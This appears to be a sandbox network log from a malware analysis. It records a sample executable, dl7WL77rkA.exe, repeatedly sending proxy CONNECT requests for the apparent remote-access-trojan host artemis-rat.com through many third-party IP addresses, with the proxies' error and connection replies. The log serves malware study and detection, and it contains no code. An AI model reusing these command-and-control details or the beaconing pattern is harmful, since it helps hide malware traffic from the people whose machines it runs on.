User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.608477116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.717600107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1198192.168.2.553258167.86.69.142363943876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.606760025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.389419079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.405498028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405314922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.202037096 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1199192.168.2.55329738.162.11.1331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.607213974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.020140886 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1200192.168.2.55330938.162.25.23731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.608834028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.019733906 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1201192.168.2.55331966.45.246.19488883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.611867905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.832782030 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1202192.168.2.553220194.8.232.4641533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.613982916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1203192.168.2.553241113.125.82.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626470089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.184598923 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1204192.168.2.553236111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626583099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1205192.168.2.553337162.241.45.22635013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626821995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.201765060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1206192.168.2.551560107.180.90.8880783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.626885891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796103954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902412891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905211926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1207192.168.2.55328366.29.128.241648103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.627315044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.846324921 CET24INHTTP/1.1 403 #string


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1208192.168.2.551508162.243.55.12509413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.701121092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796350002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902412891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905211926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1209192.168.2.552346117.160.250.13188993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.705374956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796351910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902421951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905230045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1210192.168.2.55331735.79.120.24231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.716937065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.253530979 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1211192.168.2.55328818.135.211.18231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.718342066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.009562969 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1212192.168.2.550808117.160.250.133803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.721338034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889645100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.891024113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.859690905 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.766158104 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.580354929 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1213192.168.2.55329961.110.5.2803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.722119093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.213448048 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1214192.168.2.55326152.172.1.186803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.722640038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.143032074 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1215192.168.2.551246203.76.103.5741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.724184990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1216192.168.2.553268211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.726624966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1217192.168.2.552682173.212.209.49395223876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.729626894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889645100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.890993118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.889538050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1218192.168.2.55331313.229.47.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.730498075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
